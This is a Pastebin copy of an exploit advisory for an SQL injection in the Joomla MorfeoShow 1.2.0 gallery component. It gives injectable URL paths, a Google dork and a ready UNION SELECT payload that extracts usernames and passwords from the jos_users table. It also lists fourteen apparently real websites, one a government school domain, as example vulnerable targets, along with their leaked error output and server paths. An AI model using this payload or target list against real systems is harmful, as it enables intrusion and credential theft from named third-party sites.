KingSkrupellos

Joomla MorfeoShow Components 1.2.0 SQL Injection

Jan 31st, 2019
109
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.03 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla MorfeoShow Components 1.2.0 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 31/01/2019
  7. # Vendor Homepage : joomla4ever.org
  8. # Software Download Link : joomla4ever.org/archive/ext/com_morfeoshow.zip
  9. # Software Information Link : joomla4ever.org/extensions/ext-morfeoshow
  10. # Software Version : 1.2.0
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/index.php?option=com_morfeoshow''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20. # Reference Link : cxsecurity.com/issue/WLB-2019010300
  21. packetstormsecurity.com/files/151432/Joomla-MorfeoShow-1.2.0-SQL-Injection.html
  22.  
  23. ####################################################################
  24.  
  25. # Description about Software :
  26. ***************************
  27. MorfeoShow - Photo Gallery for Joomla 1.5 + plugin to insert photos in the site's content!
  28.  
  29. ####################################################################
  30.  
  31. # Impact :
  32. ***********
  33.  
  34. * An attacker might be able inject and/or alter existing
  35.  
  36. SQL statements which would influence the database exchange.
  37.  
  38. * SQL injection vulnerability in the Joomla MorfeoShow Components 1.2.0 because,
  39.  
  40. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  41.  
  42. * On the other hand, this component MorfeoShow for Joomla! allows
  43.  
  44. remote attackers to execute arbitrary SQL commands
  45.  
  46. via the " Itemid=, gallery=, idm= "
  47.  
  48. with different parameters action to index.php.
  49.  
  50. * Exploiting this issue could allow an attacker to compromise the application, read,
  51.  
  52. access or modify data, or exploit latent vulnerabilities in the underlying database.
  53.  
  54. If the webserver is misconfigured, read & write access to the filesystem may be possible.
  55.  
  56. ####################################################################
  57.  
  58. # SQL Injection Exploit :
  59. **********************
  60.  
  61. /index.php?option=com_morfeoshow&Itemid=[SQL Injection]
  62.  
  63. /index.php?option=com_morfeoshow&task=view&gallery=[SQL Injection]
  64.  
  65. /index.php?option=com_morfeoshow&task=view&gallery=[ID-NUMBER]&Itemid=[SQL Injection]
  66.  
  67. /index.php?option=com_morfeoshow&task=view&gallery=[ID-NUMBER]&Itemid=[ID-NUMBER]&Itemid=[ID-NUMBER]&idm=[SQL Injection]
  68.  
  69. # SQL Injection Exploit Payload :
  70. *****************************
  71.  
  72. +and+1=0+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+
  73.  
  74. ####################################################################
  75.  
  76. # Example Vulnerable Sites :
  77. *************************
  78.  
  79. [+] iccrucoli.gov.it/old/index.php?option=com_morfeoshow&Itemid=8%27
  80.  
  81. [+] scuolaprimolevi.it/index.php?option=com_morfeoshow&task=view&gallery=2&Itemid=7%27
  82.  
  83. [+] elsemillero.net/nuevo/index.php?option=com_morfeoshow&Itemid=163%27
  84.  
  85. [+] thecountrychurch.com/index.php?option=com_morfeoshow&task=view&gallery=9%27
  86.  
  87. [+] funlec.com.br/biblioteca/index.php?option=com_morfeoshow&task=view&gallery=12&Itemid=199%27
  88.  
  89. [+] eolopress.it/eolo/index.php?option=com_morfeoshow&task=view&gallery=16&Itemid=258%27
  90.  
  91. [+] tarnafjallens.se/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=63%27
  92.  
  93. [+] cworksmobile.com/clab/index.php?option=com_morfeoshow&task=view&gallery=8%27
  94.  
  95. [+] zetech.pl/joomla/index.php?option=com_morfeoshow&task=view&gallery=2&Itemid=38%27
  96.  
  97. [+] floradoceara.com.br/index.php?option=com_morfeoshow&task=view&gallery=5&Itemid=13%27
  98.  
  99. [+] danilson.com.br/index.php?option=com_morfeoshow&task=view&gallery=2&Itemid=105%27
  100.  
  101. [+] 2010nw.co.za/index.php?option=com_morfeoshow&task=view&gallery=1%27
  102.  
  103. [+] eltoritosantandereano.com/index.php?option=com_morfeoshow&Itemid=66%27
  104.  
  105. [+] uspr.fr/index.php?option=com_morfeoshow&Itemid=63%27
  106.  
  107. ####################################################################
  108.  
  109. # Example SQL Database Error :
  110. ****************************
  111.  
  112. Message: Invalid controller specified (index.php) at line 242 in
  113. /var/www/novamelodica.nl/lib/Zend/Controller/Dispatcher/Standard.php
  114.  
  115. Strict Standards: Non-static method JLoader::import() should not be
  116. called statically in /home/elsemillero/public_html
  117. /nuevo/libraries/joomla/import.php on line 29
  118.  
  119. Strict Standards: Non-static method JApplication::getTemplate() should not be
  120. called statically in /home/primolevi/domains/scuolaprimolevi.it/public_html
  121. /libraries/joomla/application/helper.php on line 195 Strict Standards:
  122. Only variables should be assigned by reference in /home/primolevi/domains
  123. /scuolaprimolevi.it/public_html/components/com_morfeoshow
  124. /morfeoshow.php on line 22
  125.  
  126. jos-Warning: Error loading component: com_morfeoshow, 1
  127. JSite -> dispatch() @ /home/country/public_html/index.php:42
  128. JComponentHelper :: renderComponent() @
  129. /home/country/public_html/includes/application.php:194
  130.  
  131. Fatal error: Uncaught exception 'RuntimeException' with message
  132. 'Unknown column 'header' in 'field list' SQL=SELECT `new_url`,`header`,
  133. `published` FROM `edlpm_redirect_links` WHERE `old_url` =
  134. 'http://www.uspr.fr/index.php?option=com_morfeoshow&Itemid=63'
  135. LIMIT 0, 1' in /homepages/37/d176518689/htdocs/libraries/joomla
  136. /database/driver/mysql.php:332 Stack trace: #0 /homepages/37/d176518689
  137. /htdocs/libraries/joomla/database/driver.php(1239): JDatabaseDriverMysql->
  138. execute() #1 /homepages/37/d176518689/htdocs/plugins/system/redirect
  139. /redirect.php(86): JDatabaseDriver->loadObject() #2 [internal function]:
  140. PlgSystemRedirect::handleError(Object(Exception)) #3 {main} thrown
  141. in /homepages/37/d176518689/htdocs/libraries
  142. /joomla/database/driver/mysql.php on line 332
  143.  
  144. ####################################################################
  145.  
  146. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  147.  
  148. ####################################################################
Add Comment
Please, Sign In to add comment